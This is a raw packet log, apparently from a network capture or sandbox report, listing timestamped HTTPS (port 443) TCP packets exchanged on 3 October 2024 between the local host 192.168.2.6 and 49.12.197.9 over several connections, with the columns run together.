                                                                                                                                                                  Oct 3, 2024 03:36:03.068068027 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.070508957 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.070545912 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.070595980 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.070612907 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.070664883 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.091211081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.091227055 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.091305017 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.091325045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.092634916 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.095278978 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.095314026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.095345974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.095360041 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.095437050 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.098561049 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.130390882 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.130414963 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.130534887 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.130563974 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.130609989 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.153327942 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.153350115 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.153469086 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.153476954 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.153516054 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.158941031 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.158958912 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.159054041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.159060955 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.159096956 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.160682917 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.160698891 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.160752058 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.160758972 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.160795927 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164129019 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164145947 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164202929 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164210081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164248943 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164906025 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164922953 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.164975882 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.164982080 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.165023088 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.189409018 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.189430952 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.189524889 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.189532995 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.189585924 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.195194006 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.195209980 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.195265055 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.195272923 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.195311069 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.222928047 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.222949982 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.223052025 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.223084927 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.223129034 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.243952036 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.243973017 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.244157076 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.244167089 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.244280100 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.554852009 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.554930925 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.554938078 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.554980040 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.563936949 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.564002037 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.564035892 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.564042091 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.564052105 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.564078093 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.587356091 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.587438107 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.587445974 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.587477922 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.587507963 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.587522984 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.608119011 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.608148098 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.608189106 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.608205080 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.608220100 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.608253956 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.619687080 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.619718075 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.619790077 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.619811058 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.619824886 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.619853020 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.620807886 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.620825052 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.620874882 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.620881081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.620904922 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.620923042 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.622132063 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.622149944 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.622201920 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.622212887 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.622256041 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.622329950 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.623075008 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.623090029 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.623141050 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.623148918 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.623183012 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.646130085 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.646157026 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.646229029 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.646250963 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.646296024 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.656693935 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.656716108 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.656794071 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.656810045 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.656851053 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.677862883 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.677891970 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.678108931 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.678133011 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.678181887 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.699589968 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.699625015 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.699784994 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.699809074 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.699851036 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.710635900 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.710671902 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.710724115 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.710742950 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.710760117 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.710779905 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.712059021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.712078094 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.712119102 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.712129116 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.712157011 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.712166071 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.713799000 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.713819027 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.713876009 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.713885069 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.713922977 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.714709044 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.714728117 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.714780092 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.714788914 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.714823008 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.739821911 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.739847898 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.739932060 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.739949942 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.739990950 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.749392986 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.749413967 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.749499083 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.749511003 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.749541044 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.768416882 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.768440008 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.768587112 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.768599987 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.768647909 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.790364027 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.790396929 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.790522099 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.790535927 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.790575981 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.803103924 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.803124905 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.803199053 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.803209066 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.803251028 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.804300070 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.804317951 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.804368973 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.804373980 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.804413080 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.805948973 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.805972099 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.806008101 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.806013107 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:03.806041002 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:03.806051970 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.186532974 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.186537981 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.186573029 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.187658072 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.187674999 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.187720060 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.187726021 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.187768936 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.189382076 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.189399004 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.189456940 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.189464092 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.189495087 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.216449022 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.216464996 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.216533899 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.216545105 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.216578960 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.219676018 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.219692945 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.219739914 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.219743967 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.219774008 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.228598118 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.228615046 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.228676081 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.228679895 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.228713036 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.231023073 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.231043100 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.231077909 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.231081963 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.231106043 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.231120110 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.275465012 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.275481939 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.275513887 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.275538921 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.275551081 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.275578976 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.275588989 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.275609016 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.275938034 CEST49728443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.275952101 CEST4434972849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.300182104 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.300215006 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.300296068 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.300518990 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.300532103 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.977211952 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.977333069 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.977768898 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.977777004 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.979373932 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.979377985 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:04.979393005 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:04.979398012 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:05.466686010 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:05.466733932 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:05.466810942 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:05.467021942 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:05.467034101 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:05.847121000 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:05.847193956 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:05.847346067 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:05.848299980 CEST49729443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:05.848316908 CEST4434972949.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.117317915 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.117393970 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.117922068 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.117933989 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.119635105 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.119641066 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.742212057 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.742278099 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.742486954 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.742795944 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.742811918 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.973743916 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.973826885 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:06.974045992 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.974046946 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.975068092 CEST49730443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:06.975087881 CEST4434973049.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:07.390506983 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:07.390574932 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:07.391064882 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:07.391076088 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:07.393177986 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:07.393183947 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:08.189665079 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:08.189709902 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:08.189785004 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:08.190066099 CEST49732443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:08.190076113 CEST4434973249.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:08.274656057 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:08.274710894 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:08.274740934 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:08.274758101 CEST4434973149.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:08.274785995 CEST49731443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:08.274806023 CEST49731443192.168.2.649.12.197.9
